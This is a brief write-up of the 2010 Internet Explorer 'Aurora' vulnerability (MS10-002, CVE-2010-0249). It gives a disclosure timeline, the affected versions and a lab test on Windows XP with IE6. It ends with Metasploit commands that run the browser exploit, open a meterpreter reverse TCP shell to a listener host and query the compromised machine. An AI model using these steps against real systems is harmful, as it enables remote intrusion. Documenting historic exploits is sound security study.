MS10-002 : Internet Explorer Aurora Memory Corruption

Timeline :

Vulnerability learned by Microsoft the 2010-01-13
Metasploit PoC provided by hdm the 2010-01-15
Exploit-DB PoC provided by Ahmed Obied the 2010-01-17
Microsoft patch “KB978207” provided the 2010-01-21

PoC provided by :

unknown
hdm

Reference(s) :

CVE-2010-0249
MS10-002

Affected version(s) :

Internet Explorer 5
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8

Tested on Windows XP SP3 with :

Internet Explorer 6 before KB978207

Description :

This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the Operation Aurora attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.

Commands :

use exploit/windows/browser/ms10_002_aurora
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig